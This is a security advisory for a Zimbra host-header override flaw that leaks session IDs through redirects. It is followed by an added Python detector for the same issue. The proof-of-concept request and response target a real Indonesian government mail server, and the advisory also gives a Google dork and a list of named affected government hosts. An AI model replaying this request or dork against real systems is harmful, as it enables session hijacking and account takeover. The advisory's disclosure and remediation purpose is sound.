Zimbra - Request URL Override Vulnerability

2022.05.09
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-436

#############################################################
# Exploit Title: Zimbra - Request URL Override Vulnerability
# Exploit Author: Gh05t666nero
# Author Team: The A Team - Kejaksaan Agung
# Google Dork: inurl:/public/launchSidebar.jsp
# Software Vendor: Zimbra
# Software Version: *
# Software Link: https://www.zimbra.com/downloads
# Date: 2022-05-09
#############################################################

[*] About:
----------
Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) before 2019, is a collaborative software suite that includes an email server and a web client.

#############################################################

[*] Detail:
-----------
Some applications and frameworks support HTTP headers that can be used to override parts of the request URL, potentially affecting the routing and processing of the request. Intermediate systems are often oblivious to these headers. In the case of reverse proxies and web application firewalls, this can lead to security rulesets being bypassed. If a caching system is in place, this may enable cache poisoning attacks. These headers may also enable forging of log entries. Even if the application is intended to be accessed directly, some visitors may be using a corporate proxy, enabling localised cache poisoning.

The application appears to support the use of a custom HTTP header to override the Host header. The attacker added the following header to the request:

X-Forwarded-Host: cxsecurity.com

The value of this header was reflected in the response, showing that the header was processed.

#############################################################

[*] Impact:
-----------
This Zimbra vulnerability leaks users' cookies when they are redirected to a malicious site, allowing attackers to take over accounts via the session (see the value of the "location" response header, which carries the JSESSIONID).

#############################################################

[*] Remediation:
----------------
To fully resolve this issue, locate the component that processes the affected headers and disable it entirely. If you are using a framework, applying any pending security updates may do this for you. If this isn't practical, an alternative workaround is to configure an intermediate system to automatically strip the affected headers before they are processed.

#############################################################

[*] PoC:
--------
# Request:

GET /public/launchSidebar.jsp HTTP/2
Host: mail.polri.go.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: ZM_TEST=true; ZM_LOGIN_CSRF=4ada1b4f-e1b2-42de-940e-5ecfb2a02148
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
X-Forwarded-Host: cxsecurity.com
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

# Response:

HTTP/2 302 Found
server: nginx
date: Mon, 09 May 2022 04:48:53 GMT
content-type: text/html;charset=utf-8
content-length: 0
strict-transport-security: max-age=31536000
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
x-robots-tag: noindex
x-frame-options: SAMEORIGIN
expires: Thu, 01 Jan 1970 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, max-age=0
pragma: no-cache
set-cookie: JSESSIONID=node0foto54zfs581as22ufve2d6p53332.node0;Path=/
location: http://cxsecurity.com/;jsessionid=node0foto54zfs581as22ufve2d6p53332.node0?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED
X-Firefox-Spdy: h2

#############################################################

[*] Affected:
--------------
https://mail.polri.go.id/public/launchSidebar.jsp
https://mail.kejaksaan.go.id/public/launchSidebar.jsp
And other vital Indonesian websites.
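The following Python check is added here and is not part of the advisory. Over constructed request and response headers modelled on the PoC (the hostnames and the session ID are placeholders, not the advisory's values), it flags the two findings above: a redirect whose host reflects X-Forwarded-Host instead of Host, and a redirect URL that carries the same session ID that Set-Cookie issued. It also models the remediation of stripping the override header at the proxy.

```python
from urllib.parse import urlsplit

# Header the advisory shows being honoured as a Host override; extend the set
# if a deployment is found to process other override headers.
OVERRIDE_HEADERS = {"x-forwarded-host"}

# Constructed sample modelled on the advisory's PoC; hostnames and the
# session id are placeholders, not values taken from the advisory.
REQUEST = {"Host": "mail.example.test", "X-Forwarded-Host": "evil.example"}
RESPONSE = {
    "Set-Cookie": "JSESSIONID=node0PLACEHOLDER.node0;Path=/",
    "Location": "http://evil.example/;jsessionid=node0PLACEHOLDER.node0"
                "?loginOp=relogin&client=socialfox&loginErrorCode=service.AUTH_REQUIRED",
}

def header(headers, name):
    """Case-insensitive lookup, since HTTP header names are not case-sensitive."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)

def redirect_reflects_override(request, response):
    """True if the Location host equals an override header value and differs from Host."""
    location = header(response, "Location")
    if not location:
        return False
    target = (urlsplit(location).hostname or "").lower()
    host = (header(request, "Host") or "").split(":")[0].lower()
    for name in OVERRIDE_HEADERS:
        value = header(request, name)
        if value and target == value.split(":")[0].lower() and target != host:
            return True
    return False

def session_id_in_redirect(response):
    """True if the redirect URL carries the session id that Set-Cookie issued,
    so following the redirect hands the session to the redirect target."""
    path = urlsplit(header(response, "Location") or "").path
    cookie = header(response, "Set-Cookie") or ""
    # Servlet containers put the session id in a path parameter: /;jsessionid=<id>
    params = [p for p in path.split(";")[1:] if p.lower().startswith("jsessionid=")]
    if not params or "JSESSIONID=" not in cookie:
        return False
    url_sid = params[0].split("=", 1)[1]
    cookie_sid = cookie.split("JSESSIONID=", 1)[1].split(";", 1)[0]
    return url_sid == cookie_sid

def strip_override_headers(request):
    """Remediation model: drop override headers at the proxy before the app sees them."""
    return {k: v for k, v in request.items() if k.lower() not in OVERRIDE_HEADERS}
```

Run `redirect_reflects_override` and `session_id_in_redirect` over your own proxy's captured request and response pairs; both should return False once the intermediate system strips the header.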



Copyright 2022, cxsecurity.com